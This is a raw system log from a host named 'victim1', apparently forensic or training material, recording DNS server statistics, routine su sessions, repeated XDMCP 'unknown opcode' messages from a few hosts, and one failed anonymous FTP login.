Jan 12 07:21:58 victim1 named[385]: USAGE 947632918 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 07:21:58 victim1 named[385]: NSTATS 947632918 944119308
Jan 12 07:21:58 victim1 named[385]: XSTATS 947632918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 07:40:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 07:54:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 08:01:00 victim1 PAM_pwdb[18767]: (su) session opened for user news by (uid=0)
Jan 12 08:01:01 victim1 PAM_pwdb[18767]: (su) session closed for user news
Jan 12 08:09:00 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 08:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 08:21:58 victim1 named[385]: USAGE 947636518 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 08:21:58 victim1 named[385]: NSTATS 947636518 944119308
Jan 12 08:21:58 victim1 named[385]: XSTATS 947636518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 08:40:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 08:54:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 09:01:00 victim1 PAM_pwdb[18826]: (su) session opened for user news by (uid=0)
Jan 12 09:01:01 victim1 PAM_pwdb[18826]: (su) session closed for user news
Jan 12 09:09:00 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 09:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 09:21:58 victim1 named[385]: USAGE 947640118 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 09:21:58 victim1 named[385]: NSTATS 947640118 944119308
Jan 12 09:21:58 victim1 named[385]: XSTATS 947640118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 09:40:54 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 09:54:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 10:01:00 victim1 PAM_pwdb[18885]: (su) session opened for user news by (uid=0)
Jan 12 10:01:01 victim1 PAM_pwdb[18885]: (su) session closed for user news
Jan 12 10:09:00 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 10:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 10:21:58 victim1 named[385]: USAGE 947643718 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 10:21:58 victim1 named[385]: NSTATS 947643718 944119308
Jan 12 10:21:58 victim1 named[385]: XSTATS 947643718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 10:40:54 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 10:54:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 11:01:01 victim1 PAM_pwdb[18950]: (su) session opened for user news by (uid=0)
Jan 12 11:01:02 victim1 PAM_pwdb[18950]: (su) session closed for user news
Jan 12 11:08:59 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 11:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 11:21:58 victim1 named[385]: USAGE 947647318 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 11:21:58 victim1 named[385]: NSTATS 947647318 944119308
Jan 12 11:21:58 victim1 named[385]: XSTATS 947647318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 11:40:54 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 11:54:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 12:01:00 victim1 PAM_pwdb[19009]: (su) session opened for user news by (uid=0)
Jan 12 12:01:01 victim1 PAM_pwdb[19009]: (su) session closed for user news
Jan 12 12:08:59 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 12:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 12:21:58 victim1 named[385]: USAGE 947650918 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 12:21:58 victim1 named[385]: NSTATS 947650918 944119308
Jan 12 12:21:58 victim1 named[385]: XSTATS 947650918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 12:54:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 13:01:00 victim1 PAM_pwdb[19068]: (su) session opened for user news by (uid=0)
Jan 12 13:01:01 victim1 PAM_pwdb[19068]: (su) session closed for user news
Jan 12 13:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 13:21:58 victim1 named[385]: USAGE 947654518 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 13:21:58 victim1 named[385]: NSTATS 947654518 944119308
Jan 12 13:21:58 victim1 named[385]: XSTATS 947654518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 13:33:19 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 13:41:16 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 13:50:30 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 13:50:36 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 13:51:25 victim1 last message repeated 2 times
Jan 12 13:51:25 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 13:54:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 14:01:00 victim1 PAM_pwdb[19127]: (su) session opened for user news by (uid=0)
Jan 12 14:01:02 victim1 PAM_pwdb[19127]: (su) session closed for user news
Jan 12 14:01:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 12 14:01:34 victim1 last message repeated 2 times
Jan 12 14:13:38 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 14:13:52 victim1 last message repeated 3 times
Jan 12 14:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 14:21:58 victim1 named[385]: USAGE 947658118 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 14:21:58 victim1 named[385]: NSTATS 947658118 944119308
Jan 12 14:21:58 victim1 named[385]: XSTATS 947658118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 14:50:30 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 14:54:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 15:01:01 victim1 PAM_pwdb[19186]: (su) session opened for user news by (uid=0)
Jan 12 15:01:04 victim1 PAM_pwdb[19186]: (su) session closed for user news
Jan 12 15:01:33 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 12 15:15:40 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 15:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 15:21:58 victim1 named[385]: USAGE 947661718 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 15:21:58 victim1 named[385]: NSTATS 947661718 944119308
Jan 12 15:21:58 victim1 named[385]: XSTATS 947661718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 15:35:40 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.99
Jan 12 15:35:40 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.99
Jan 12 15:50:32 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 15:54:34 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.78
Jan 12 16:01:01 victim1 PAM_pwdb[19245]: (su) session opened for user news by (uid=0)
Jan 12 16:01:02 victim1 PAM_pwdb[19245]: (su) session closed for user news
Jan 12 16:01:32 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 12 16:17:47 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 16:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 16:21:58 victim1 named[385]: USAGE 947665318 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 16:21:58 victim1 named[385]: NSTATS 947665318 944119308
Jan 12 16:21:58 victim1 named[385]: XSTATS 947665318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 16:50:32 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 17:01:01 victim1 PAM_pwdb[19304]: (su) session opened for user news by (uid=0)
Jan 12 17:01:01 victim1 PAM_pwdb[19304]: (su) session closed for user news
Jan 12 17:01:32 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.243
Jan 12 17:18:13 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 17:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 17:21:58 victim1 named[385]: USAGE 947668918 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 17:21:58 victim1 named[385]: NSTATS 947668918 944119308
Jan 12 17:21:58 victim1 named[385]: XSTATS 947668918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 17:40:03 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 18:01:00 victim1 PAM_pwdb[19363]: (su) session opened for user news by (uid=0)
Jan 12 18:01:01 victim1 PAM_pwdb[19363]: (su) session closed for user news
Jan 12 18:04:13 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 18:04:13 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 12 18:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 18:21:58 victim1 named[385]: USAGE 947672518 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 18:21:58 victim1 named[385]: NSTATS 947672518 944119308
Jan 12 18:21:58 victim1 named[385]: XSTATS 947672518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 18:40:06 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 19:01:00 victim1 PAM_pwdb[19422]: (su) session opened for user news by (uid=0)
Jan 12 19:01:01 victim1 PAM_pwdb[19422]: (su) session closed for user news
Jan 12 19:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 19:21:58 victim1 named[385]: USAGE 947676118 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 19:21:58 victim1 named[385]: NSTATS 947676118 944119308
Jan 12 19:21:58 victim1 named[385]: XSTATS 947676118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 20:01:00 victim1 PAM_pwdb[19481]: (su) session opened for user news by (uid=0)
Jan 12 20:01:02 victim1 PAM_pwdb[19481]: (su) session closed for user news
Jan 12 20:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 20:21:58 victim1 named[385]: USAGE 947679718 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 20:21:58 victim1 named[385]: NSTATS 947679718 944119308
Jan 12 20:21:58 victim1 named[385]: XSTATS 947679718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 21:01:00 victim1 PAM_pwdb[19540]: (su) session opened for user news by (uid=0)
Jan 12 21:01:02 victim1 PAM_pwdb[19540]: (su) session closed for user news
Jan 12 21:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 21:21:58 victim1 named[385]: USAGE 947683318 944119308 CPU=0.92u/3.03s CHILDCPU=0u/0s
Jan 12 21:21:58 victim1 named[385]: NSTATS 947683318 944119308
Jan 12 21:21:58 victim1 named[385]: XSTATS 947683318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 22:01:02 victim1 PAM_pwdb[19599]: (su) session opened for user news by (uid=0)
Jan 12 22:01:04 victim1 PAM_pwdb[19599]: (su) session closed for user news
Jan 12 22:15:45 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 22:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 22:21:58 victim1 named[385]: USAGE 947686918 944119308 CPU=0.94u/3.06s CHILDCPU=0u/0s
Jan 12 22:21:58 victim1 named[385]: NSTATS 947686918 944119308
Jan 12 22:21:58 victim1 named[385]: XSTATS 947686918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 12 23:01:01 victim1 PAM_pwdb[19658]: (su) session opened for user news by (uid=0)
Jan 12 23:01:02 victim1 PAM_pwdb[19658]: (su) session closed for user news
Jan 12 23:15:48 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 12 23:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 12 23:21:58 victim1 named[385]: USAGE 947690518 944119308 CPU=0.94u/3.09s CHILDCPU=0u/0s
Jan 12 23:21:58 victim1 named[385]: NSTATS 947690518 944119308
Jan 12 23:21:58 victim1 named[385]: XSTATS 947690518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 00:01:00 victim1 PAM_pwdb[19717]: (su) session opened for user news by (uid=0)
Jan 13 00:01:02 victim1 PAM_pwdb[19717]: (su) session closed for user news
Jan 13 00:15:51 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 00:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 00:21:58 victim1 named[385]: USAGE 947694118 944119308 CPU=0.94u/3.09s CHILDCPU=0u/0s
Jan 13 00:21:58 victim1 named[385]: NSTATS 947694118 944119308
Jan 13 00:21:58 victim1 named[385]: XSTATS 947694118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 01:01:01 victim1 PAM_pwdb[19776]: (su) session opened for user news by (uid=0)
Jan 13 01:01:03 victim1 PAM_pwdb[19776]: (su) session closed for user news
Jan 13 01:15:52 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 01:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 01:21:58 victim1 named[385]: USAGE 947697718 944119308 CPU=0.94u/3.09s CHILDCPU=0u/0s
Jan 13 01:21:58 victim1 named[385]: NSTATS 947697718 944119308
Jan 13 01:21:58 victim1 named[385]: XSTATS 947697718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 02:01:01 victim1 PAM_pwdb[19835]: (su) session opened for user news by (uid=0)
Jan 13 02:01:01 victim1 PAM_pwdb[19835]: (su) session closed for user news
Jan 13 02:15:53 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 02:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 02:21:58 victim1 named[385]: USAGE 947701318 944119308 CPU=0.94u/3.09s CHILDCPU=0u/0s
Jan 13 02:21:58 victim1 named[385]: NSTATS 947701318 944119308
Jan 13 02:21:58 victim1 named[385]: XSTATS 947701318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 03:01:00 victim1 PAM_pwdb[19894]: (su) session opened for user news by (uid=0)
Jan 13 03:01:01 victim1 PAM_pwdb[19894]: (su) session closed for user news
Jan 13 03:15:54 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 03:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 03:21:58 victim1 named[385]: USAGE 947704918 944119308 CPU=0.94u/3.09s CHILDCPU=0u/0s
Jan 13 03:21:58 victim1 named[385]: NSTATS 947704918 944119308
Jan 13 03:21:58 victim1 named[385]: XSTATS 947704918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 04:01:00 victim1 PAM_pwdb[19953]: (su) session opened for user news by (uid=0)
Jan 13 04:01:02 victim1 PAM_pwdb[19953]: (su) session closed for user news
Jan 13 04:02:00 victim1 PAM_pwdb[19993]: (su) session opened for user news by (uid=0)
Jan 13 04:02:54 victim1 PAM_pwdb[19993]: (su) session closed for user news
Jan 13 04:06:28 victim1 PAM_pwdb[20466]: (su) session opened for user news by (uid=0)
Jan 13 04:06:29 victim1 PAM_pwdb[20466]: (su) session closed for user news
Jan 13 04:15:55 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 04:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 04:21:58 victim1 named[385]: USAGE 947708518 944119308 CPU=0.94u/3.09s CHILDCPU=0u/0s
Jan 13 04:21:58 victim1 named[385]: NSTATS 947708518 944119308
Jan 13 04:21:58 victim1 named[385]: XSTATS 947708518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 05:01:01 victim1 PAM_pwdb[20570]: (su) session opened for user news by (uid=0)
Jan 13 05:01:03 victim1 PAM_pwdb[20570]: (su) session closed for user news
Jan 13 05:09:45 victim1 ftpd[20606]: failed login from 212-133-147-10.sbs.net.tr [212.133.147.10], anonymous@ftp.microsoft.com
Jan 13 05:10:02 victim1 ftpd[20606]: FTP session closed
Jan 13 05:10:02 victim1 telnetd[20607]: ttloop:  read: Connection reset by peer 
Jan 13 05:15:56 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 05:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 05:21:58 victim1 named[385]: USAGE 947712118 944119308 CPU=0.97u/3.12s CHILDCPU=0u/0s
Jan 13 05:21:58 victim1 named[385]: NSTATS 947712118 944119308
Jan 13 05:21:58 victim1 named[385]: XSTATS 947712118 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 06:01:00 victim1 PAM_pwdb[20631]: (su) session opened for user news by (uid=0)
Jan 13 06:01:01 victim1 PAM_pwdb[20631]: (su) session closed for user news
Jan 13 06:15:57 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 06:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 06:21:58 victim1 named[385]: USAGE 947715718 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 06:21:58 victim1 named[385]: NSTATS 947715718 944119308
Jan 13 06:21:58 victim1 named[385]: XSTATS 947715718 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 07:01:00 victim1 PAM_pwdb[20690]: (su) session opened for user news by (uid=0)
Jan 13 07:01:02 victim1 PAM_pwdb[20690]: (su) session closed for user news
Jan 13 07:15:58 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 07:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 07:21:58 victim1 named[385]: USAGE 947719318 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 07:21:58 victim1 named[385]: NSTATS 947719318 944119308
Jan 13 07:21:58 victim1 named[385]: XSTATS 947719318 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 08:01:00 victim1 PAM_pwdb[20749]: (su) session opened for user news by (uid=0)
Jan 13 08:01:01 victim1 PAM_pwdb[20749]: (su) session closed for user news
Jan 13 08:15:59 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 08:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 08:21:58 victim1 named[385]: USAGE 947722918 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 08:21:58 victim1 named[385]: NSTATS 947722918 944119308
Jan 13 08:21:58 victim1 named[385]: XSTATS 947722918 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
Jan 13 09:01:00 victim1 PAM_pwdb[20808]: (su) session opened for user news by (uid=0)
Jan 13 09:01:01 victim1 PAM_pwdb[20808]: (su) session closed for user news
Jan 13 09:16:00 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.177
Jan 13 09:16:24 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 09:16:24 victim1 gdm[705]: gdm_xdmcp_decode_packet: Unknown opcode from host 137.189.97.252
Jan 13 09:21:58 victim1 named[385]: Cleaned cache of 0 RRs
Jan 13 09:21:58 victim1 named[385]: USAGE 947726518 944119308 CPU=0.97u/3.13s CHILDCPU=0u/0s
Jan 13 09:21:58 victim1 named[385]: NSTATS 947726518 944119308
Jan 13 09:21:58 victim1 named[385]: XSTATS 947726518 944119308 RR=1 RNXD=0 RFwdR=0 RDupR=0 RFail=0 RFErr=0 RErr=0 RAXFR=0 RLame=0 ROpts=0 SSysQ=1 SAns=0 SFwdQ=0 SDupQ=0 SErr=0 RQ=0 RIQ=0 RFwdQ=0 RDupQ=0 RTCP=0 SFwdR=0 SFail=0 SFErr=0 SNaAns=0 SNXD=0
